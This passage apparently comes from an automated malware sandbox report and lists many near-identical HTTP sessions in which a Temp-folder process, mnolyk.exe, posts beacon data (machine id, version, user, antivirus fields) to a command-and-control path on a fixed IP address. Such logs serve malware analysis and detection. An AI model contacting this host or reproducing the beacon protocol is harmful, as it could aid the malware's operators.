                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      738192.168.2.75043362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:19.240531921 CET853OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:19.304296017 CET853INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:19 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      739192.168.2.75043462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:19.489028931 CET854OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:19.552669048 CET854INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:19 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      74192.168.2.74976962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:21.212903023 CET189OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:21.278456926 CET189INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:21 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      740192.168.2.75043562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:19.733664036 CET855OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:19.798017025 CET855INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:19 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      741192.168.2.75043662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:19.971883059 CET856OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:20.039480925 CET856INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:20 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      742192.168.2.75043762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:20.219041109 CET857OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:20.282939911 CET857INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:20 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      743192.168.2.75043862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:20.467632055 CET858OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:20.530093908 CET858INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:20 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      744192.168.2.75043962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:20.713212013 CET859OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:20.776303053 CET859INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:20 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      745192.168.2.75044062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:20.951914072 CET860OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:21.013782978 CET860INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:20 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      746192.168.2.75044162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:21.186453104 CET861OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:21.252027988 CET861INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:21 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      747192.168.2.75044262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:21.434130907 CET862OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:21.496160984 CET862INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:21 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      748192.168.2.75044362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:21.669847965 CET863OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:21.732448101 CET863INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:21 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      749192.168.2.75044462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:21.912070990 CET864OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:21.975343943 CET864INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:21 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      75192.168.2.74977062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:21.455441952 CET190OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:21.518047094 CET190INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:21 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      750192.168.2.75044562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:22.165070057 CET865OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:22.231156111 CET865INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:22 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      751192.168.2.75044662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:22.408032894 CET866OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:22.473037004 CET866INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:22 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      752192.168.2.75044762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:22.643399954 CET867OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:22.707236052 CET867INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:22 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      753192.168.2.75044862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:22.892314911 CET868OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:22.956516027 CET868INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:22 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      754192.168.2.75044962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:23.123641014 CET869OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:23.188611031 CET869INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:23 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      755192.168.2.75045062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:23.361476898 CET870OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
